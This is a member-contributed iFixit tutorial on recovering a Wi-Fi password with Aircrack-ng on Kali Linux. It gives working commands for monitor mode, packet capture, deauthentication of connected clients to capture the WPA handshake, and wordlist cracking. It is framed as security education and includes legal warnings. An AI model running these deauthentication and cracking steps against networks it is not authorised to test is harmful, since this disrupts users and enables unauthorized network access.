Difficulty

Moderate

Steps

9

Time Required

                          35 minutes            

Sections

1

  • How to recover a Wi-Fi passwords with Aircrack-ng
  • 9 steps

Flags

Member-Contributed Guide

An awesome member of our community made this guide. It is not managed by iFixit staff.

  • BackKali

  • Full Screen

  • Options

  • History

  • Save to Favorites

  • Download PDF

  • Edit

  • Translate

  • Get Shareable Link

  • Embed This Guide

  • Notify Me of Changes

  • Stop Notifications

Introduction

The following guide was made with the purpose of educating others on cyber security tools, technologies, and techniques with the intention of educating others on better protecting their own technologies and data. Please use the knowledge gained from this guide responsibly.

This guide will walk you through how to use Kali’s Aircrack-ng to recover the password to a wireless network.

Ideally you will need the following before you start this guide…

  • A Wi-Fi network adapter that supports monitor modeThe Kali Linux OS with Aircrack-ng installed (Learn how to install Kali onto a VM here)A password dictionary (wordlist)

Normally, if you installed Kali Linux normally you should already have Aircrack-ng pre-installed onto your machine. However, you can install the Aircrack-ng tool by using the command sudo apt install aircrack-ng

What you need

Step 1

              Open Kali's command line Terminal               
  • Press Ctrl + Alt + T to open the Terminal Interface.

Press Ctrl + Alt + T to open the Terminal Interface.

1024

Step 2

              Check your Wireless Adapter               
  • Enter the command ifconfig. This will show all your networking interfaces connected to your device.
  • If your operating system recognizes your adapter, then you should see wlan0 under the lo section. However, if you have multiple adapters it may be listed as a different name.

Enter the command ifconfig. This will show all your networking interfaces connected to your device.

If your operating system recognizes your adapter, then you should see wlan0 under the lo section. However, if you have multiple adapters it may be listed as a different name.

Step 3

              Enable Monitor Mode               
  • Enter the command sudo airmon-ng start wlan0
  • If your adapter is under a different name simply substitute the name where wlan0 is shown
  • If your network adapter supports Monitor Mode then you should see (monitor mode enabled) at the bottom of the screen.
  • The command will also list any processes that might cause issues later on during this guide. These processes should be killed before continuing, which we will demonstrate in the next step.

Enter the command sudo airmon-ng start wlan0

If your adapter is under a different name simply substitute the name where wlan0 is shown

If your network adapter supports Monitor Mode then you should see (monitor mode enabled) at the bottom of the screen.

The command will also list any processes that might cause issues later on during this guide. These processes should be killed before continuing, which we will demonstrate in the next step.

Step 4

              Kill any processes listed               
  • Use the command airmon-ng check kill to check and kill any processes that will interfere.
  • Alternatively, you can use the kill command followed by the numbers used to identify the process.

Use the command airmon-ng check kill to check and kill any processes that will interfere.

Alternatively, you can use the kill command followed by the numbers used to identify the process.

Step 5

              Find your wireless network               
  • Use the command airodump-ng wlan0 to discover any wireless networks around you.
  • You will need to use Ctrl + C to end the searching process

Use the command airodump-ng wlan0 to discover any wireless networks around you.

You will need to use Ctrl + C to end the searching process

Step 6

              Find the network in the list               
  • Find your network under the ESSID column.
  • Take note of the following information in your networks row. Channel (CH), BSSID.

Find your network under the ESSID column.

Take note of the following information in your networks row. Channel (CH), BSSID.

Step 7

              Capture your networks packets               
  • Use the command sudo airodump-ng -c Channel Number -w ESSID Name —bssid BSSID Numbers wlan0 to start capturing your networks packets
  • Your command should look something like this: sudo airodump-ng -c 1 -w kali —bssid 50:D4:F7:E5:66:F4 wlan0

Use the command sudo airodump-ng -c Channel Number -w ESSID Name —bssid BSSID Numbers wlan0 to start capturing your networks packets

Your command should look something like this: sudo airodump-ng -c 1 -w kali —bssid 50:D4:F7:E5:66:F4 wlan0

Step 8

              Start the de-authenticating process               
  • Without closing your previous terminal, open a new terminal with Ctrl + Alt + T
  • Enter the command aireplay-ng -0 RXQ Number -a BSSID Number wlan0
  • Your command will look like aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0
  • Once you de-authenticate your clients you should have your WPA handshake in the upper right hand corner where it says WPA handshake.
  • Once you have your handshake, take note of it and end both processes with Ctrl + C

Without closing your previous terminal, open a new terminal with Ctrl + Alt + T

Enter the command aireplay-ng -0 RXQ Number -a BSSID Number wlan0

Your command will look like aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0

Once you de-authenticate your clients you should have your WPA handshake in the upper right hand corner where it says WPA handshake.

Once you have your handshake, take note of it and end both processes with Ctrl + C

Step 9

              Decrypting the four way handshake               
  • Use your wordlist to decrypt your handshake with the command aircrack-ng -w your word list.txt kali-01.cap

Use your wordlist to decrypt your handshake with the command aircrack-ng -w your word list.txt kali-01.cap

The most important thing you should take away from this guide is to remember to use this information responsibly. Obtaining unauthorized access to another’s computer system or systems is illegal under the Computer Fraud & Abuse Act.

Please use the knowledge gained from this guide responsibly.

Cancel: I did not complete this guide.

                                                                                      2 other people completed this guide.                                             

Author

                                      with 3 other contributors 

                    Jacob Mehnert                     

Member since: 10/18/2021

12,621 Reputation

                                      31 Guides authored                  



                       Badges:
                       42







                                                        +39 more badges                           

Team

                       iFanatics                        

                                                  Member of iFanatics 



                    Community                     


                                            49 Members                     


                                            102 Guides authored